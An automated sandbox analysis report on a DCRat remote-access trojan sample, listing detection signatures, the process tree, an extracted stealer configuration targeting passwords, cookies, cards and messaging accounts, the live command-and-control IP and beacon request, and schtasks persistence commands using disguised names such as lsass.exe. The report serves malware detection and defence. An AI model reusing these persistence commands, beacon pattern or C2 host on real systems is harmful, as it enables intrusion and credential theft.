Play interactive tour

Edit tour

Windows Analysis Report 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Overview

General Information

Sample Name:	9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Analysis ID:	553369
MD5:	a4d367f98a1fa3e594af0875379bda39
SHA1:	a82d6bafcc260138eb11b4a511ff6f3e80441ce3
SHA256:	9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b8f3040eb8f3d29ef149
Tags:	DCRatexe
Infos:
Most interesting Screenshot:

Detection

DCRat

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Antivirus detection for dropped file

Yara detected DCRat

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Creates processes via WMI

Machine Learning detection for sample

Machine Learning detection for dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Drops PE files with benign system names

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to communicate with device drivers

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

File is packed with WinRar

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe" MD5: A4D367F98A1FA3E594AF0875379BDA39)

wscript.exe (PID: 6628 cmdline: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 5360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

refhostperfdllCommonsessionnetsvc.exe (PID: 744 cmdline: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe MD5: 4E66AE5C311A1AADC1241790C112525F)

refhostperfdllCommonsessionnetsvc.exe (PID: 5292 cmdline: "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe" MD5: 4E66AE5C311A1AADC1241790C112525F)

schtasks.exe (PID: 2572 cmdline: schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

wjIuhVBtfHXnMCZlWDoj.exe (PID: 6632 cmdline: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe MD5: 4E66AE5C311A1AADC1241790C112525F)

schtasks.exe (PID: 6560 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 6276 cmdline: schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

lsass.exe (PID: 2936 cmdline: C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe MD5: 4E66AE5C311A1AADC1241790C112525F)

wjIuhVBtfHXnMCZlWDoj.exe (PID: 1744 cmdline: "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe" MD5: 4E66AE5C311A1AADC1241790C112525F)

lsass.exe (PID: 1680 cmdline: "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe" MD5: 4E66AE5C311A1AADC1241790C112525F)

cleanup

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"u\":\"#\",\"d\":\"(\",\"M\":\"<\",\"2\":\"%\",\"D\":\">\",\"8\":\"_\",\"9\":\"~\",\"O\":\"&\",\"I\":\"|\",\"w\":\")\",\"X\":\"!\",\"1\":\"-\",\"x\":\",\",\"y\":\".\",\"Q\":\";\",\"A\":\" \",\"p\":\"^\",\"Y\":\"@\",\"W\":\"`\",\"G\":\"*\",\"i\":\"$\",\"Z\":\"+\"}", "PCRT": "{\"C\":\")\",\"F\":\"*\",\"Q\":\"!\",\"2\":\"@\",\"V\":\" \",\"B\":\"^\",\"U\":\"$\",\"T\":\"<\",\"o\":\"&\",\"R\":\"+\",\"d\":\".\",\"c\":\";\",\"O\":\"%\",\"p\":\">\",\"E\":\"-\",\"S\":\",\",\"l\":\"~\",\"D\":\"_\",\"3\":\"|\",\"H\":\"(\",\"G\":\"#\",\"1\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-OkjwC4qi8XjmDi2c70LT", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%UsersFolder% - Fast", "AD": false}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.935944649.0000000013028000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x2aafa8:$: RWcVFBQU
0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000007.00000002.714469777.0000000013283000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x20ffa8:$: RWcVFBQU
Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x2af5b2:$: RWcVFBQU
Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 6632	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 5292	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: lsass.exe PID: 2936	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 1744	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: lsass.exe PID: 1680	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x1b64c2:$: RWcVFBQU
Process Memory Space: lsass.exe PID: 1680	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 11 entries

Sigma Overview

System Summary:

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution

Show sources

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe" , ParentImage: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, ParentProcessId: 6580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" , ProcessId: 6628

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000A.00000002.726915147.0000000002541000.00000004.00000001.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"u\":\"#\",\"d\":\"(\",\"M\":\"<\",\"2\":\"%\",\"D\":\">\",\"8\":\"_\",\"9\":\"~\",\"O\":\"&\",\"I\":\"|\",\"w\":\")\",\"X\":\"!\",\"1\":\"-\",\"x\":\",\",\"y\":\".\",\"Q\":\";\",\"A\":\" \",\"p\":\"^\",\"Y\":\"@\",\"W\":\"`\",\"G\":\"*\",\"i\":\"$\",\"Z\":\"+\"}", "PCRT": "{\"C\":\")\",\"F\":\"*\",\"Q\":\"!\",\"2\":\"@\",\"V\":\" \",\"B\":\"^\",\"U\":\"$\",\"T\":\"<\",\"o\":\"&\",\"R\":\"+\",\"d\":\".\",\"c\":\";\",\"O\":\"%\",\"p\":\">\",\"E\":\"-\",\"S\":\",\",\"l\":\"~\",\"D\":\"_\",\"3\":\"|\",\"H\":\"(\",\"G\":\"#\",\"1\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-OkjwC4qi8XjmDi2c70LT", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%UsersFolder% - Fast", "AD": false}

Antivirus detection for dropped file

Show sources

Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Avira: detection malicious, Label: HEUR/AGEN.1141820
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Avira: detection malicious, Label: HEUR/AGEN.1141820
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Avira: detection malicious, Label: HEUR/AGEN.1141820
Source: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1141820

Machine Learning detection for sample

Show sources

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Joe Sandbox ML: detected
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe	Joe Sandbox ML: detected

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0100A5F4
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0101B8E0
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102AAA8 FindFirstFileExA,	0_2_0102AAA8

Source: global traffic

HTTP traffic detected: GET /7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsqldownloads.php?8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj&ad86a6d64cd9a9c991d6459f2f76c879=2c265b3bebbb4f72fb0a4abcd42fd52d&7ff5ed2a3db2907b96c3c5c975e1934b=wYiFDMykTM1ATZzUGZhVGN2cjYlFmM0YzNwEGMjNGMiRzYhJDZ1IzM&8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 47.254.235.229Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 47.254.235.229
Source: unknown	TCP traffic detected without corresponding DNS query: 47.254.235.229
Source: unknown	TCP traffic detected without corresponding DNS query: 47.254.235.229

Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	String found in binary or memory: http://47.254.235.229
Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	String found in binary or memory: http://47.254.235.229/7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/
Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935167405.00000000010E8000.00000004.00000001.sdmp	String found in binary or memory: http://47.254.235.229/7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsq
Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	String found in binary or memory: http://47.254.235.229x
Source: lsass.exe, 00000014.00000002.935090036.00000000010A8000.00000004.00000001.sdmp	String found in binary or memory: http://ctl254.235.229/7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsq
Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.712103997.0000000003250000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/

Source: global traffic

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000014.00000002.935944649.0000000013028000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000007.00000002.714469777.0000000013283000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744, type: MEMORYSTR	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: lsass.exe PID: 1680, type: MEMORYSTR	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

File created: C:\Windows\System32\umdmxfrm

Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100857B	0_2_0100857B
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01031194	0_2_01031194
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102D00E	0_2_0102D00E
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100407E	0_2_0100407E
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_010170BF	0_2_010170BF
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01003281	0_2_01003281
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100E2A0	0_2_0100E2A0
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_010202F6	0_2_010202F6
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102070E	0_2_0102070E
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102473A	0_2_0102473A
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_010137C1	0_2_010137C1
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_010027E8	0_2_010027E8
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01016646	0_2_01016646
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100F968	0_2_0100F968
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01024969	0_2_01024969
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100E8A0	0_2_0100E8A0
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01020B43	0_2_01020B43
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0102CB60	0_2_0102CB60
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01013A3C	0_2_01013A3C
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01016A7B	0_2_01016A7B
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100ED14	0_2_0100ED14
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01013D6D	0_2_01013D6D
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101FDFA	0_2_0101FDFA
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01015C77	0_2_01015C77
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01005F3C	0_2_01005F3C
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_01020F78	0_2_01020F78
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100BE13	0_2_0100BE13
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0100DE6C	0_2_0100DE6C
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Code function: 7_2_00007FFA362648A2	7_2_00007FFA362648A2
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Code function: 7_2_00007FFA362649A2	7_2_00007FFA362649A2

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: String function: 0101E28C appears 35 times
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: String function: 0101E360 appears 52 times
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: String function: 0101ED00 appears 31 times

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_0100718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0100718C

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669450664.000000000340E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669450664.000000000340E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000002.670220738.000000000342D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000002.670220738.000000000342D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669465613.000000000342C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669465613.000000000342C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669430120.0000000003405000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669430120.0000000003405000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Section loaded: policymanager.dll	Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

File read: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Jump to behavior

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe "C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe"
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe'" /rl HIGHEST /f
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
Source: unknown	Process created: C:\Users\user\Pictures\Camera Roll\lsass.exe C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe
Source: unknown	Process created: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
